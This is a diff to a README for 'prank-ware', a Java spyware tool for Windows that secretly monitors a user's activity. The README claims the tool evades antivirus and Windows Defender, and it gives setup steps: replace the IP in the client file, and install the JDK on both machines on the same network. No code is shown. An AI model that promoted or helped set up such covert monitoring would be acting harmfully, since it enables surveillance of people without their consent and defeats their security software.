DhesiTheKing/prank-ware/README.md

 # Prank-ware
 This a GUI based Windows spyware application created using Java for discreet user activity monitoring and some other fun activities with client.
-This is undetectable by anti-virusus and windows defender.
-The only requirement for this project was JDK.
+This is undetectable by anti-virusus and windows defender.Replace the IP in the client file with your System's file.
-# Features
+# Reqirements
+-JDK should installed in both systems.
+-Should be connected in the same network.
 # Demo

 when the client connected with you.
 You will recive this Message